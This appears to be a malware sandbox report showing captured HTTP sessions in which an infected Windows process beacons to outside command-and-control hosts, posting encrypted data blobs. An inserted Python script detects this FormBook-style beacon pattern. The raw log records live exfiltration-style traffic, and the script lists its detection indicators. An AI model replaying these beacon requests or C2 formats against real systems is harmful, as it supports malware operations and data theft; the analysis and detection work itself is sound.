                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zJZRyA8oGJV%2BvpWSnvJ4DnZnyq4d8QE6LYC90EY7mXHaI5Khb039SPF1Z0PulEfbtmBL%2BOjGNNxunDkK%2BEvhLbpWU6VSU4yOHa3YCy%2FcQH8KfHG9IouIHGMSnguVW4pim8%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe84507e89c330-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=22937&min_rtt=22937&rtt_var=11468&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 c5 1f 14 7f bf e0 12 ea 25 37 94 c8 c2 ba 85 0f e5 92 ee 53 11 8a [TRUNCATED]
                                                                  Data Ascii: 161uAK1{;eE(!mEj-1mM0l+E\|^rux|@d!_pCdV%.^Xh<*FftCQ(is{8wN-'GZ'28D{bBm7>-z-p+bKNWoBMM]GShmKFF-3#tNf99d&%7S;"}px10


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   8 | 192.168.2.4 | 49851 | 104.21.48.233 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:46.916726112 CET | 457 | OUT | GET /al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                   Jan 10, 2025 18:51:47.516448975 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:47 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KhOXLFHlqVpL8PAE1%2B8LR6Nao0YmNvSLmm%2F%2FOJHUqvhmlBWWTz9qrg13OQ9no8zUlN797BOQTl1bIWpGfQ5FMDlOfZj0404FX%2FGMJuzg0uCAFxa%2BxtR%2FHAt9SLqMhVzbBMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe8460be6d7cf0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f [TRUNCATED]
                                                                  Data Ascii: 2c2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4o
                                                                   Jan 10, 2025 18:51:47.516563892 CET | 256 | IN | Data Raw: 74 72 45 56 44 75 2f 51 41 2f 4f 37 58 6f 47 7a 62 77 42 35 66 38 70 6a 6e 71 65 75 62 75 31 32 44 6c 4f 4c 65 78 66 33 67 3d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74
                                                                  Data Ascii: trEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g=</td></tr><tr><td>Server:</td><td>luodiye-aws-node1</td></tr><tr><td>Date:</td><td>2025/01/11 01:51:47</td></tr></table><hr/>Powered by X<hr><center>tengine</center></body></h


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   9 | 192.168.2.4 | 49882 | 199.59.243.228 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:52.626663923 CET | 740 | OUT | POST /cfcv/ HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.969-usedcar02.shop
                                                                  Referer: http://www.969-usedcar02.shop/cfcv/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 46 68 6d 58 6e 7a 73 6e 45 57 6d 78 50 4e 49 36 77 66 43 34 45 6b 73 68 64 78 46 76 56 55 45 64 65 49 69 6c 6b 4f 64 59 6a 33 64 44 43 71 35 6a 38 52 70 7a 4c 5a 50 32 36 6e 4b 6d 66 62 62 69 43 61 43 4a 7a 6d 44 57 51 31 74 77 66 52 59 74 4f 61 38 57 6a 2f 71 2f 73 38 78 47 6e 4e 65 4a 4c 62 4b 59 62 61 4f 6b 52 47 56 6b 64 4e 48 73 30 53 47 70 39 6c 49 56 48 54 65 37 46 33 61 4e 75 46 2f 56 56 74 49 39 4e 34 69 46 42 33 2f 47 58 61 38 4d 79 55 6f 4b 2f 44 52 34 48 30 6a 66 34 7a 68 55 31 77 5a 4e 38 64 62 77 43 2b 53 4c 59 51 61 50 2b 51 3d 3d
                                                                  Data Ascii: 3h=/Hr8eDk/7MGMFhmXnzsnEWmxPNI6wfC4EkshdxFvVUEdeIilkOdYj3dDCq5j8RpzLZP26nKmfbbiCaCJzmDWQ1twfRYtOa8Wj/q/s8xGnNeJLbKYbaOkRGVkdNHs0SGp9lIVHTe7F3aNuF/VVtI9N4iFB3/GXa8MyUoK/DR4H0jf4zhU1wZN8dbwC+SLYQaP+Q==
                                                                   Jan 10, 2025 18:51:53.072082043 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:52 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1138
                                                                  x-request-id: 46c20837-e7e3-4aa3-99dd-5353070a6282
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                                  set-cookie: parking_session=46c20837-e7e3-4aa3-99dd-5353070a6282; expires=Fri, 10 Jan 2025 18:06:53 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                   Jan 10, 2025 18:51:53.072132111 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDZjMjA4MzctZTdlMy00YWEzLTk5ZGQtNTM1MzA3MGE2MjgyIiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   10 | 192.168.2.4 | 49898 | 199.59.243.228 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:55.168140888 CET | 760 | OUT | POST /cfcv/ HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.969-usedcar02.shop
                                                                  Referer: http://www.969-usedcar02.shop/cfcv/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 67 64 65 6f 53 6c 6a 50 64 59 69 33 64 44 4a 4b 35 6d 79 78 70 38 4c 5a 4c 45 36 6a 4b 6d 66 62 2f 69 43 66 2b 4a 7a 58 44 52 54 46 74 79 55 78 59 76 52 4b 38 57 6a 2f 71 2f 73 38 6c 38 6e 4e 6d 4a 4c 4c 61 59 59 37 4f 6e 59 6d 56 72 56 74 48 73 77 53 47 74 39 6c 49 37 48 53 79 46 46 30 69 4e 75 45 50 56 56 59 6f 38 44 49 69 66 5a 58 2b 77 53 35 4a 42 33 30 77 44 79 53 6c 6c 4a 33 2f 37 35 31 73 4f 6b 42 34 61 75 64 2f 44 66 35 62 2f 56 54 6e 47 6c 59 32 63 64 6f 4a 30 36 78 78 46 51 6c 73 4e 4d 66 52 44 62 32 38 3d
                                                                  Data Ascii: 3h=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmgdeoSljPdYi3dDJK5myxp8LZLE6jKmfb/iCf+JzXDRTFtyUxYvRK8Wj/q/s8l8nNmJLLaYY7OnYmVrVtHswSGt9lI7HSyFF0iNuEPVVYo8DIifZX+wS5JB30wDySllJ3/751sOkB4aud/Df5b/VTnGlY2cdoJ06xxFQlsNMfRDb28=
                                                                   Jan 10, 2025 18:51:55.715234995 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:55 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1138
                                                                  x-request-id: 4041aa37-1fce-4322-9a38-0c01192dcd8d
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                                  set-cookie: parking_session=4041aa37-1fce-4322-9a38-0c01192dcd8d; expires=Fri, 10 Jan 2025 18:06:55 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                   Jan 10, 2025 18:51:55.715260983 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDA0MWFhMzctMWZjZS00MzIyLTlhMzgtMGMwMTE5MmRjZDhkIiwicGFnZV90aW1lIjoxNzM2NTMxNT
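
Across sessions 7 to 10 the requests share one hard-coded User-Agent, a single four-character directory (/al74/, /cfcv/), one two-character form key ("3h") carrying a base64-looking blob, and on every POST a Referer equal to the request's own URL; the Firefox 3.5.5 User-Agent sits next to Accept and Accept-Encoding values (image/avif, br) that a 2009 browser never sent. The responses (generic Cloudflare 404s, then a domain-parking page setting a parking_session cookie) do not slow the beaconing down, so the request shape is the stable thing to detect. The following scoring check is an added example, not part of the Joe Sandbox report: the indicator regexes, indicator names and the hit threshold are this example's own assumptions drawn from the capture, and the sample requests are constructed copies of the session 7 POST and session 8 GET plus one benign request.

```python
"""Score raw HTTP requests for the FormBook beacon shape seen in the capture above.

Added example, not part of the Joe Sandbox report. The indicator regexes, the
indicator names and the hit threshold are assumptions drawn from sessions 7-10;
the sample requests below are constructed copies of rows from that capture.
"""
import re
from urllib.parse import urlsplit

# Exact User-Agent string sent on every request in the capture.
FORMBOOK_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) "
               "Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)")

# Assumed shapes: /al74/ and /cfcv/ paths, "3h=<b64>" body, "Ol=..&3h=<b64>" query.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
POST_BODY_RE = re.compile(r"^[A-Za-z0-9]{2}=[A-Za-z0-9+/]+={0,2}$")
GET_QUERY_RE = re.compile(
    r"^[A-Za-z0-9]{2}=[A-Za-z0-9_-]+&[A-Za-z0-9]{2}=[A-Za-z0-9+/]+={0,2}$")


def parse_request(raw):
    """Split one raw HTTP/1.1 request into (method, target, headers, body).

    Header names are lower-cased; the body is whatever follows the blank line.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def score_request(raw):
    """Return the list of indicators one request matches (empty list = clean)."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    ua = headers.get("user-agent", "")
    hits = []
    if ua == FORMBOOK_UA:
        hits.append("ua:formbook-firefox-3.5.5")
    # A 2009-era Firefox 3.5 cannot advertise image/avif or brotli: the header
    # set is assembled by hand, whatever the UA claims.
    if "Firefox/3.5" in ua and ("image/avif" in headers.get("accept", "")
                               or "br" in headers.get("accept-encoding", "")):
        hits.append("ua/accept-mismatch")
    if PATH_RE.match(url.path):
        hits.append("path:4char-dir")
    if method == "POST" and POST_BODY_RE.match(body):
        hits.append("post:2char-key-b64-body")
    if method == "GET" and GET_QUERY_RE.match(url.query):
        hits.append("get:two-2char-keys")
    # Referer pointing at the request's own URL although no page was ever loaded.
    own_url = "http://%s%s" % (headers.get("host", ""), url.path)
    if method == "POST" and headers.get("referer") == own_url:
        hits.append("self-referer")
    return hits


def is_formbook_beacon(raw, min_hits=3):
    """Flag a request once it matches at least min_hits indicators (assumed threshold)."""
    return len(score_request(raw)) >= min_hits


def _req(*lines):
    """Join request line and headers with CRLF; the last argument is the body."""
    *head, body = lines
    return "\r\n".join(head) + "\r\n\r\n" + body


# Constructed copy of the session 7 POST (body taken from the capture above).
SAMPLE_POST = _req(
    "POST /al74/ HTTP/1.1",
    "Host: www.ausyva4.top",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "Accept-Encoding: gzip, deflate, br",
    "Accept-Language: en-us",
    "Content-Type: application/x-www-form-urlencoded",
    "Connection: close",
    "Origin: http://www.ausyva4.top",
    "Referer: http://www.ausyva4.top/al74/",
    "User-Agent: " + FORMBOOK_UA,
    "3h=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7JAo6fEXmU9q2hcWz9qtLUK0MCplm8y16TS"
    "+I1SDAHAvRIhUbTmfBv4RZ+fuBLVHfjI7y7WJam2L3HRNJK8BHeieYfCIMmK5Pk2WgNCi+Pxp7tZXlaYs8"
    "Ahyt4UxFOdwZ12KHDCJ3pdNRVj6Yk9zLJJtGUSEkTv2TmTX5CcrtoMIF8=",
)

# Constructed copy of the session 8 GET.
SAMPLE_GET = _req(
    "GET /al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= HTTP/1.1",
    "Host: www.ausyva4.top",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language: en-us",
    "Connection: close",
    "User-Agent: " + FORMBOOK_UA,
    "",
)

# Constructed benign request (hypothetical host) that must not be flagged.
SAMPLE_BENIGN = _req(
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Encoding: gzip, deflate, br",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "",
)

if __name__ == "__main__":
    for name, raw in (("post", SAMPLE_POST), ("get", SAMPLE_GET), ("benign", SAMPLE_BENIGN)):
        print(name, is_formbook_beacon(raw), score_request(raw))
```

The check deliberately ignores the hostname and the server's reply: the same binary posts the same 219-, 10299- and 199-byte bodies to both www.ausyva4.top and www.969-usedcar02.shop and carries on after a 404 and after a parked-domain 200, so a "not found" answer is no reason to clear the host. The "3h" payload itself is left alone; it is encrypted and nothing on this page provides the key.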


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   11 | 192.168.2.4 | 49913 | 199.59.243.228 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:57.715754032 CET | 10842 | OUT | POST /cfcv/ HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.969-usedcar02.shop
                                                                  Referer: http://www.969-usedcar02.shop/cfcv/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
